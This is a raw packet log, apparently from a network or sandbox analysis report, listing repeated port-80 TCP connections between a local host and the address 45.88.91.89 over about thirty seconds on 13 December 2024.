                                                      Dec 13, 2024 14:33:49.881211996 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.922777891 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.977381945 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:49.998722076 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.998725891 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:49.998960018 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.118799925 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.118892908 CET804997245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.119016886 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.119020939 CET4997280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.119132042 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.119539976 CET804997145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.119595051 CET4997180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.239185095 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.469595909 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:50.589420080 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.589449883 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:50.589462996 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.208178997 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.250740051 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.441313028 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.485131025 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.558572054 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.558670044 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.678767920 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.678901911 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.679011106 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.679136992 CET804997745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:51.679193020 CET4997780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:51.799083948 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:52.032130003 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:52.151963949 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:52.151984930 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:52.152000904 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:52.814378977 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:52.860135078 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.049446106 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:53.094508886 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.197875023 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.198280096 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.319144011 CET804997945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:53.319163084 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:53.319209099 CET4997980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.319257975 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.319369078 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.439599991 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:53.672761917 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:53.792646885 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:53.792685986 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:53.792714119 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:54.406219006 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:54.453902006 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.641321898 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:54.688355923 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.763895035 CET4999080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.763973951 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.883861065 CET804999045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:54.884236097 CET804998545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:54.884345055 CET4998580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.884495974 CET4999080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.884495974 CET4999080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.985704899 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:54.985780954 CET4999080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.004391909 CET804999045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.105758905 CET804999245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.105868101 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.105959892 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.106760979 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.149087906 CET804999045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.225934029 CET804999245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.226675034 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.226826906 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.227169037 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.346898079 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.454009056 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.574043036 CET804999245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.574105024 CET804999245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.578948021 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:55.703808069 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.703849077 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.703879118 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.775933027 CET804999045.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:55.776010990 CET4999080192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.210119963 CET804999245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:56.250758886 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.357489109 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:56.407037973 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.445296049 CET804999245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:56.500793934 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.589221001 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:56.641388893 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.718625069 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.718628883 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.718950033 CET4999880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.838666916 CET804999845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:56.838742971 CET4999880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.838814020 CET804999245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:56.838865042 CET4999280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.838886023 CET4999880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.839386940 CET804999345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:56.839437008 CET4999380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:56.958709955 CET804999845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:57.188438892 CET4999880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:57.308325052 CET804999845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:57.308357954 CET804999845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:57.308406115 CET804999845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:57.979693890 CET804999845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:58.032022953 CET4999880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:58.215620995 CET804999845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:58.266411066 CET4999880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:58.346714973 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:58.466648102 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:58.466768026 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:58.466857910 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:58.586616993 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:58.813446045 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:58.933422089 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:58.933435917 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:58.933499098 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:59.552851915 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:59.594671011 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:59.785231113 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:33:59.828908920 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:59.910423040 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:33:59.910727978 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:00.030683994 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:00.030858994 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:00.030901909 CET805000345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:00.030910015 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:00.030956984 CET5000380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:00.150719881 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:00.376034975 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:00.495943069 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:00.495992899 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:00.496006012 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:01.115986109 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:01.157030106 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.349132061 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:01.391402006 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.454528093 CET5001180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.455544949 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.468024969 CET4999880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.469867945 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.574436903 CET805001145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:01.574502945 CET5001180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.575726986 CET805000645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:01.575794935 CET5000680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.589839935 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:01.589991093 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.590090990 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:01.710226059 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:01.939287901 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:02.059273005 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:02.059298992 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:02.059324026 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:02.675849915 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:02.719538927 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:02.909147024 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:02.953968048 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:03.332973003 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:03.336010933 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:03.453722000 CET805001245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:03.453866005 CET5001280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:03.455817938 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:03.455893040 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:03.456089973 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:03.575834036 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:03.813497066 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:03.933514118 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:03.933562040 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:03.933597088 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:04.612742901 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:04.657061100 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:04.845293999 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:04.891453028 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:04.966619968 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:04.966911077 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:05.086765051 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:05.086822987 CET805001645.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:05.086911917 CET5001680192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:05.087090969 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:05.087090969 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:05.206994057 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:05.438585997 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:05.558563948 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:05.558583021 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:05.558593988 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:06.173295021 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:06.219662905 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.405173063 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:06.454042912 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.470071077 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.470562935 CET5002780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.535981894 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.590409040 CET805002145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:06.590441942 CET805002745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:06.590481043 CET5002180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.590491056 CET5002780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.655880928 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:06.655965090 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.656091928 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:06.775939941 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:07.001132011 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:07.121232986 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:07.121299982 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:07.121331930 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:07.747376919 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:07.797672987 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:07.981231928 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:08.032221079 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:08.108244896 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:08.108370066 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:08.228199005 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:08.228342056 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:08.228527069 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:08.228652954 CET805002845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:08.228718996 CET5002880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:08.348577023 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:08.581093073 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:08.701085091 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:08.701157093 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:08.701189041 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:09.314498901 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:09.360171080 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:09.553270102 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:09.594652891 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:09.674866915 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:09.675472975 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:09.795428038 CET805003245.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:09.795687914 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:09.795754910 CET5003280192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:09.795800924 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:09.795923948 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:09.915767908 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:10.141527891 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:10.262326002 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:10.262377024 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:10.262413025 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:10.880501986 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:10.922801018 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.116856098 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.157166958 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.230972052 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.231743097 CET5004180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.351331949 CET805003745.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.351430893 CET5003780192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.351695061 CET805004145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.351802111 CET5004180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.351912022 CET5004180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.471641064 CET805004145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.579721928 CET5004180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.580492973 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.699465990 CET5004580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.700274944 CET805004445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.700383902 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.700481892 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.741120100 CET805004145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.819281101 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.820203066 CET805004445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:11.820348978 CET5004580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.820432901 CET5004580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:11.940665960 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:12.047894001 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:12.168420076 CET805004445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:12.168919086 CET805004445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:12.172714949 CET5004580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:12.282330990 CET805004145.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:12.282563925 CET5004180192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:12.292964935 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:12.292999029 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:12.293114901 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:12.953524113 CET805004445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.032246113 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.052211046 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.173146963 CET805004445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.239574909 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.266415119 CET5004580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.314819098 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.433398962 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.433439970 CET5004580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.433634996 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.553500891 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.553589106 CET805004445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.553864002 CET5004480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.553922892 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.553922892 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.554116011 CET805004545.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.554275036 CET5004580192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:13.673821926 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:13.907143116 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:14.027060032 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:14.027137995 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:14.027169943 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:14.643115997 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:14.735327005 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:14.878845930 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:14.922776937 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:14.996239901 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:14.996371031 CET5005380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:15.116190910 CET805005345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:15.116293907 CET5005380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:15.116354942 CET805004945.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:15.116419077 CET5004980192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:15.116473913 CET5005380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:15.236756086 CET805005345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:15.469687939 CET5005380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:15.591377020 CET805005345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:15.591417074 CET805005345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:15.591445923 CET805005345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:16.203387976 CET805005345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:16.266521931 CET5005380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:16.438047886 CET805005345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:16.563334942 CET5005380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:16.564512014 CET5005380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:16.566122055 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:16.686208963 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:16.686389923 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:16.686465025 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:16.806273937 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:17.032128096 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:17.152017117 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:17.152034044 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:17.152100086 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:17.891248941 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:17.938304901 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.021173000 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.063302040 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.140647888 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.140921116 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.188808918 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.260951042 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.261008024 CET805005845.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.261084080 CET5005880192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.261101961 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.261209965 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.308717966 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.311395884 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.311486959 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.381284952 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.431349993 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.610286951 CET5006380192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.657241106 CET5006480192.168.2.645.88.91.89
                                                      Dec 13, 2024 14:34:18.730267048 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.730282068 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.730293989 CET805006345.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.777221918 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:18.777246952 CET805006445.88.91.89192.168.2.6
                                                      Dec 13, 2024 14:34:19.346435070 CET805006345.88.91.89192.168.2.6
